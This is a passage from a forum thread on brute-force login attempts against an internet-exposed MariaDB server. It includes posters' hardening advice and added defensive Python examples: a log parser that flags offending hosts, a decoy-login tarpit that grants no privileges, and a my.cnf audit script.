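            q.popleft()
        if len(q) >= maxretry:
            banned.add(host)
    return banned


# Constructed sample modelled on the excerpt above.
SAMPLE = """\
2020-12-15 11:38:41 2070 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:41 2071 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2072 [Warning] Access denied for user 'admin'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:42 2073 [Warning] Access denied for user 'mcUser'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2074 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:43 2075 [Warning] Access denied for user 'cloudera'@'66.128.254.69' (using password: YES)
2020-12-15 11:38:44 2076 [Warning] Access denied for user 'root'@'66.128.254.69' (using password: NO)
2020-12-15 12:42:01 2297 [Warning] Hostname 'zg-0915b-171.stretchoid.com' does not resolve to '192.241.238.9'.
2020-12-15 14:12:35 2444 [Warning] Access denied for user 'root'@'42.192.225.22' (using password: YES)
2020-12-15 14:12:45 2451 [Warning] Access denied for user 'admin'@'42.192.225.22' (using password: YES)
2020-12-15 14:13:02 2457 [Warning] Access denied for user 'user'@'42.192.225.22' (using password: YES)
2020-12-15 14:14:12 2507 [Warning] Access denied for user 'guest'@'42.192.225.22' (using password: YES)
2020-12-15 15:00:00 2600 [Warning] Access denied for user 'app'@'10.0.0.5' (using password: YES)
""".splitlines()

if __name__ == "__main__":
    for host, s in summarise(SAMPLE).items():
        print(f"{host}: {s['attempts']} attempts, {s['per_second']}/s, users={s['users']}")
    print("ban:", sorted(offenders(SAMPLE)))
```

The server's own `max_connect_errors` counter is not a defence against this: in MySQL it counts only protocol handshake errors, not rejected passwords. What stops it is not exposing the port (skip-networking or a loopback bind-address, as discussed later in the thread) and, where remote access is really needed, a fail2ban jail on this log plus a firewall allow-list.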
#!drvy, reply #7, 6 January 2021, 13:27 pm:

Quote:
For a few hours I forgot to add skip-networking to MariaDB's (MySQL) my.cnf

After installing mysql-server, it is always advisable to run

Code:
mysql_secure_installation

Regards

Daniel, reply #8, 6 January 2021, 14:11 pm:

Hi, regarding the login attempts it is as drvy says: you assign a public IP, bring up a server, and the login attempts appear right away. But you could set a rather interesting and ingenious trap for them, something that works perfectly for login attempts or brute force.

What is the goal of brute-forcing a system? Or what do they want to do when they try to log in with some username on the server? It is precisely to obtain the correct credentials to get in. But after getting in, what happens to those attempts? They simply stop, they stop insisting, because obviously they already got access.

What could be done is to say OK to everything: when a system detects those attempts, it accepts the logins as if they were correct. It sets a trap for them, and when the attacker believes they already have access, it is simply false, they don't have it, but their automated system (the attacker's) is useless, because everything it tries is correct, even though obviously they are fake logins and it won't grant access to anything. This way the attacker is left confused, will notice that security measure, and what will they end up doing? Abandoning the site... the same goes if it is something automated: by accepting any login, that bot/script will stop, and so will the attempts.

It is possibly a safer method than other systems that keep rejecting those thousands of logins all the time; this way it accepts them and makes them believe they have access when in reality they don't, so they cannot know which login is the correct one. It is like port scanners, which can be made to believe (by showing them as open) that certain ports are open when they are actually closed, for attackers or automated systems.


Regards
« Last edited: 6 January 2021, 14:34 pm by [D]aniel »

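The decoy-login idea in the post above, as an added example (my code, not from the thread or any product): a small server-side login handler that verifies credentials against a salted-hash store and, once a source has exceeded maxretry failures, answers every further attempt with a reply byte-identical to a real success, bound to a session that carries no privileges. The edge case worth handling is that a correct guess from an already-tarpitted source must also get a decoy, otherwise the difference in reply leaks exactly the signal the trap is meant to remove. The user store, threshold and session shape are constructed for illustration; a real deployment would also expire the failure counters.

```python
"""Decoy logins for brute-forcers: after maxretry failures from one source, every
further attempt gets a reply indistinguishable from success, bound to a session
that holds no privileges.

Added example of the idea in the post above, not code from the thread or any
product. The user store, threshold and session shape are constructed for
illustration; a real deployment would also expire the failure counters.
"""
import hashlib
import hmac
import os
from collections import defaultdict

SUCCESS_REPLY = "OK: authenticated"      # identical for real and decoy sessions
FAIL_REPLY = "ERR: access denied"
_DUMMY_SALT = bytes(16)


def _kdf(password, salt):
    """Password hashing for the demo store (PBKDF2-HMAC-SHA256, 50k rounds)."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


class TarpitAuth:
    def __init__(self, users, maxretry=3):
        # users: {name: password}, kept only as salt + hash (constructed store)
        self._store = {}
        for name, pw in users.items():
            salt = os.urandom(16)
            self._store[name] = (salt, _kdf(pw, salt))
        self.maxretry = maxretry
        self.failures = defaultdict(int)     # failed attempts per source address

    def _verify(self, user, password):
        rec = self._store.get(user)
        if rec is None:
            _kdf(password, _DUMMY_SALT)      # same cost for unknown users
            return False
        salt, digest = rec
        return hmac.compare_digest(_kdf(password, salt), digest)

    def login(self, src, user, password):
        """Return (reply_sent_to_client, server_side_session_or_None)."""
        tarpitted = self.failures[src] >= self.maxretry
        if self._verify(user, password) and not tarpitted:
            self.failures[src] = 0
            return SUCCESS_REPLY, {"user": user, "privileges": ("shell",),
                                   "decoy": False}
        if not tarpitted:
            self.failures[src] += 1
            tarpitted = self.failures[src] >= self.maxretry
        if tarpitted:
            # From here on every reply looks like a hit, including for a
            # correct guess, so the wordlist yields no signal about which
            # attempt was right; the session itself grants nothing.
            return SUCCESS_REPLY, {"user": user, "privileges": (), "decoy": True}
        return FAIL_REPLY, None


if __name__ == "__main__":
    auth = TarpitAuth({"root": "correct horse battery staple"})
    for guess in ("123456", "password", "root", "correct horse battery staple"):
        reply, session = auth.login("198.51.100.9", "root", guess)
        print(guess, "->", reply, session)
```

Two practical caveats: the decoy session has to stay coherent after login (an empty read-only view, or a proper honeypot shell), otherwise the attacker's post-login check unmasks it immediately; and keying the trap by source address catches legitimate users behind the same NAT, so pair it with an allow-list for known administrative addresses.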
el-brujo, reply #9, 6 January 2021, 14:22 pm:

You're right #!drvy, I forgot to run the "secure installation" because I copied part of the config from the migrated server.

https://mariadb.com/kb/en/mysql_secure_installation/

I have neither the test database nor an anonymous user.

I added some other basic security options in the my.cnf file

Code:
#security
local-infile=0
# comment this out to allow remote mysql
skip-networking
#no dns lookups
skip-name-resolve

Quote:
What is the goal of brute-forcing a system? Or what do they want to do when they try to log in with some username on the server?

They are automatic, automated attacks for sure. If you use weak or default credentials, then there you go, you become part of a botnet or something worse.

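The thread's root cause was a copied my.cnf with skip-networking left out, which only showed up in the error log hours later. The audit script below is an added example (mine, not code from the post) that reads the INI-style file the server uses, normalises option names (the server treats `-` and `_` in option names as equivalent, and bare flags such as `skip-networking` carry no `=`), and checks the three settings from the post: whether the TCP listener is reachable from the network, whether LOAD DATA LOCAL is allowed, and whether reverse-DNS lookups run on every connection. The sample files are constructed: the weak one reproduces the migrated config, the hardened one the options posted above, and a third shows the loopback-bind alternative for hosts that cannot use skip-networking.

```python
"""Audit a my.cnf for the exposure discussed in this thread.

Added example, not code from the post. It reads the INI-style file the server
uses, normalises option names ('-' and '_' are equivalent to the server) and
checks the three settings posted above. All sample files are constructed.
"""

LOOPBACK = {"127.0.0.1", "::1", "localhost"}
ON = {"1", "on", "true", "yes"}
OFF = {"0", "off", "false", "no"}


def parse_mycnf(text):
    """Return {section: {option: value}}; bare flags such as skip-networking get '1'."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("!"):          # blank, comment, !include*
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, {})
            continue
        if current is None:
            continue
        key, eq, val = line.partition("=")
        key = key.strip().lower().replace("-", "_")
        sections[current][key] = val.strip().strip('"') if eq else "1"
    return sections


def audit(text):
    """Return [(code, message)] for the option groups the server reads."""
    cfg = parse_mycnf(text)
    opts = {}
    for group in ("server", "mysqld", "mariadb"):     # later groups override
        opts.update(cfg.get(group, {}))

    def get(key, default):
        return opts.get(key, default).lower()

    findings = []
    bind = get("bind_address", "*")                   # unset = all interfaces
    if get("skip_networking", "0") not in ON and bind not in LOOPBACK:
        findings.append(("network-exposed",
                         f"TCP listener reachable from the network (bind_address={bind}); "
                         "set skip-networking, or bind-address=127.0.0.1 if local only"))
    if get("local_infile", "1") not in OFF:           # MariaDB's default is ON
        findings.append(("local-infile",
                         "LOAD DATA LOCAL enabled; set local-infile=0 unless needed"))
    if get("skip_name_resolve", "0") not in ON:
        findings.append(("name-resolve",
                         "reverse DNS lookups on connect; set skip-name-resolve "
                         "and write grants by IP address"))
    return findings


WEAK_CNF = """\
# constructed: config copied from the old server, skip-networking forgotten
[mysqld]
datadir = /var/lib/mysql
bind-address = 0.0.0.0
"""

HARDENED_CNF = """\
# constructed: same file with the options from the post added
[mysqld]
datadir = /var/lib/mysql
#security
local-infile=0
# comment this out to allow remote mysql
skip-networking
#no dns lookups
skip-name-resolve
"""

LOCAL_CNF = """\
# constructed: TCP kept for local clients, bound to loopback instead
[mariadb]
bind-address = 127.0.0.1
local_infile = OFF
skip_name_resolve = ON
"""

if __name__ == "__main__":
    for name, cnf in (("weak", WEAK_CNF), ("hardened", HARDENED_CNF), ("local", LOCAL_CNF)):
        print(name, audit(cnf) or "no findings")
```

Run it against `/etc/mysql/my.cnf` and every file under `/etc/mysql/conf.d/` and `mariadb.conf.d/`, since a later file can re-enable what an earlier one disabled; the parser skips `!includedir` lines rather than following them, so concatenate the files in load order before auditing.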